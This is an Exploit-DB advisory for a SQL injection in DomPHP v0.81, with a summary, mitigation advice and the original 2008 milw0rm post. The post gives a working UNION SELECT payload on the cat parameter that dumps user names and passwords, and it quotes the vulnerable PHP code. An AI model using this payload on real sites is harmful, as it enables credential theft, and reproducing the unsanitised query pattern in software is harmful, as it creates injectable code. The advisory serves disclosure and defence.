Vendor: DomPHP
By: MhZ91
CVSS: 7.5 (HIGH)
Type: Remote SQL Injection
CWE: 89
Product Name: DomPHP
Affected Version From: v0.81
Affected Version To: v0.81
Patch Exists: Yes
Related CWE: N/A
CPE: a:domphp:domphp:0.81
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

DomPHP v0.81 Remote Sql Injection

A remote SQL injection vulnerability exists in DomPHP v0.81. The cat parameter of /agenda/index.php is read from the query string and interpolated directly into a SELECT statement without casting, escaping or parameter binding, so an attacker can append a UNION SELECT in a crafted HTTP request and read arbitrary data from the back-end database, including user names and passwords (the nomUtilisateur and passUtilisateur columns of the domphp_utilisateurs table). The published payload uses no quote characters (the separator is built with char(58)), so quote escaping alone, such as magic_quotes_gpc, would not have blocked it.

Mitigation:

Upgrade to a DomPHP release later than v0.81 that fixes this issue. If upgrading is not immediately possible, cast the cat parameter to an integer (for example with intval()) or pass it as a bound parameter instead of interpolating it into the query text in /agenda/index.php, and review the application's other query-building code, since the advisory notes further injection points.

Exploit-DB raw data:

--==+================================================================================+==--
--==+		         DomPHP v0.81 Remote Sql Injection                           +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: DomPHP v0.81 Remote Sql Injection
 Download: http://www.domphp.com/download/cat.php?idcat=1
 Bug: Remote Sql Injection
 Info: DomPHP is a fully modular and, above all, completely customizable publishing tool! Ideal for experts but also for novices who want to present a quality site: you will build your portal or website in a few clicks!
 Visit: http://www.inj3ct-it.org


[*]----------------------------------------------------------

Exploit:

http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*

To get the user name and password, you must replace [UserId] with the id number of a member.
The admin's id is 1 by default.

Vuln code in /agenda/index.php

[...]

if ($_GET['cat']) {
	$cat = $_GET['cat'];

	if (!$nomcat) {
		// $cat comes straight from the query string and is interpolated unquoted
		// into the statement: no cast, no escaping, no parameter binding.
		$requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat";
		$result5=mysql_query($requete5, $link);
		$recherchenomcat=mysql_fetch_object($result5);
		$nomcat = stripslashes($recherchenomcat->nomCategorie);
	}
[...]

There are other SQL injections as well...

[*]----------------------------------------------------------

# milw0rm.com [2008-01-11]